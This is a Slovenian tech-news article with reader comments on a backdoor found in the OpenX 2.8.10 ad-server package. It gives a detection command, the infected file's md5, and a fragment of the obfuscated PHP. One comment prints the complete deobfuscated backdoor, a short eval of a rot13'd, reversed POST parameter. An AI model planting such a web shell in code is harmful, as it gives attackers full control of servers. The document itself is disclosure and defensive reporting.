» »

OpenX vsebuje stranska vrata

OpenX vsebuje stranska vrata

Heise - Trenutna različica strežniške programske opreme za posredovanje oglasov OpenX 2.10 vsebuje stranska vrata, ki se aktivno uporabljajo za napade na strežniške sisteme. Stranska vrata omogočajo izvajanje poljubne PHP kode. Administratorji OpenX-a so odstranili prizadete pakete s svojih strežnikov in se trenutno še ukvarjajo z rešitvijo. Heiko Weber je pri "rutinski kontroli" enega od oglasnih strežnikov odkril nenavadne vnose v dnevniške zapise in v nadaljevanju odkril stranska vrata v izvorni kodi OpenX. Svoje odkritje je posredoval varnostnemu oddelku spletne strani Heise, ki so obstoj stranskih vrat tudi potrdili.

Obstoj stranskih vrat lahko administratorji preverijo z ukazom:
find . -name \*.js -exec grep -l '<?php' {} \;

V primeru, da nam sistem vrne ime datoteke gre tu za datoteko JavaScript, ki vsebuje s komentarji zapleteno (obfuscated) PHP kodo:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

Datoteka se aktivira s pozivom require_once(), sam poziv pa je možno sprožiti oddaljeno preko URL-ja. Sama zlonamerna koda se nahaja v stisnjeni datoteki (zip) s časovnim žigom 12.9.2012, ki se ekstrahira pri namestitvi programskega paketa:

openx-2.8.10/etc/plugins/openXVideoAds.zip 
     md5: 6b3459f16238aa717f379565650cb0cf

Napadalci uporabijo stranska vrata za vzpostavitev PHP ukazne lupine v /www/images/debugs.php, s čimer si lahko pridobijo popoln nadzor nad spletnim strežnikom.

Priporočamo pregled logov in odstranitev OpenX, dokler zadeva ni rešena!

10 komentarjev

FireSnake ::

Dobro spisano ....
Poglej in se nasmej: vicmaher.si

wungad ::

Men je tud všeč:D
.

čuhalev :: 

<?php
$j='explode';
$_=$j(",",'strrev,str_rot13,vastPlayer');
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

Tole je vsa zlobna™ koda ;)

techfreak :) ::

Kako točno lahko izkoristiš ta back door? V javascript datoteki imaš php kodo, ki se pa tako ne izvede ... torej sploh ni ranljivosti?

Isotropic ::

se izvede
http://www.heise.de/security/meldung/Ac...

prevedi si

MrStein ::

FireSnake je izjavil:

Dobro spisano ....

Heh, jaz sem pa ravno obratno pomislil: dobra vsebina, a slabo/površno napisano.
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

techfreak :) ::

Nisem našel ... prav tako nisem našel več informacij o tem backdooru v angleščini. Ugotovil sem da so nekje uporabili require_once(), še vseeno pa mi to ne pove veliko.

Zgodovina sprememb…

Isotropic ::

jah nasel ga je nek nemec, tako da ocitno se ni prislo do usa medijev. prevedi si z g translate.

techfreak :) ::

Glede na prevod je tole na heise.de samo neke vrste povzetek oz. ne piše natančno kaj vse je še bilo spremenljeno poleg te JS datoteke. Novico sem že nekaj 2 dni nazaj zasledil v angleščini samo še vseeno ni nič kaj več ni pisalo kot tukaj.

Zgodovina sprememb…

vbohinc ::

Openx Source 2.8.11 Security Update, če vas zanima več... vsebuje tudi navodila, kako odstraniti stranska vrata iz obstoječe inštalacije.
Human nature is not a machine to be built after a model, and set to
do exactly the work prescribed for it, but a tree, which requires to grow
and develop itself on all sides...

Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

ESET odkril 21 kosov malwara za Linux (strani: 1 2 3 4 5 )

Oddelek: Novice / Varnost		23144278 (38128) MrStein
»

Vsak Intelov procesor ima še svoj operacijski sistem (strani: 1 2 )

Oddelek: Novice / Varnost		7522487 (14671) Ales
»

PC hodi ven, na wetransfer-d3.openxenterprise.com

Oddelek: Informacijska varnost		61210 (776) Iatromantis
»

Juniper odkril podtaknjena stranska vrata v svojih napravah (strani: 1 2 )

Oddelek: Novice / NWO		6728625 (24169) AC_DC
»

Sistem za upravljanje z reklamami

Oddelek: Izdelava spletišč		5702 (588) neoserv

Več podobnih tem